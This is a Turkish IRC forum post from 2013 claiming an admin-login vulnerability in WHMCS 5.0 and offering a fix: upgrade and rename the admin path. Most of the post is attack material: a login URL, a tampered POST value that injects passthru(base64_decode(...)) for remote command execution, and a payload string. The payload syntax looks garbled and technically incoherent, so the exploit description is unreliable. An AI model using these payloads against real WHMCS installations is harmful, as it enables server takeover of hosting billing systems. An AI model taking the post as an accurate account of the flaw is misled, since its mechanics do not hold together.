IRCForumları - IRC ve mIRC Kullanıcılarının Buluşma Noktası
  digitalpanel

Etiketlenen Kullanıcılar

Yeni Konu aç Cevapla
 
LinkBack Seçenekler Stil
Alt 22 Ağustos 2013, 12:12   #1
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)
whmcs 5.x güvenlik açığı




whmcs 5.0 sürümünde bir güvenlik açığı mevcut, ancak 5.1'de önbellek güvenlik eklentisi eklendi.

http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}

eğer önbellek doğrulama yok ise (5.0 sürümünde eksik) sayfa yüklenmeye çalışacak ve tamper data veya benzeri bir modül ile POST_SESSION değeri aşağıdaki gibi değiştirildiğinde yönetici sayfası açılacaktır.

POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";

PAYLOAD: $payload = "login=1&title=1&execorder=0&hook=urlencoded&r edir ect={admin_index}";

şuan için olası çözüm olarak sürüm yükseltilebilir ve admin panel yolu değiştirilebilir,

 
Alıntı ile Cevapla

IRCForumlari.NET Reklamlar
sohbet odaları eglen sohbet sohbet
Cevapla

Etiketler
5x, açığı, güvenlik, whmcs


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Kapalı
Pingbacks are Açık
Refbacks are Açık


Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
Yok böyle güvenlik açığı! Zen Bilim Dünyasından Son Haberler 0 19 Kasım 2012 14:09
İşlemcide güvenlik açığı! Dilara Güvenlik Açıkları 0 23 Mart 2009 13:34
Explorer'da Güvenlik Açığı.. Dilara Güvenlik Açıkları 0 26 Aralık 2008 10:50
DNS Güvenlik Açığı Ocean Güvenlik Açıkları 2 07 Ağustos 2008 09:30
Güvenlik Açığı MSN'yi Karıştırdı DoStNaMe Güvenlik Açıkları 0 09 Haziran 2005 15:10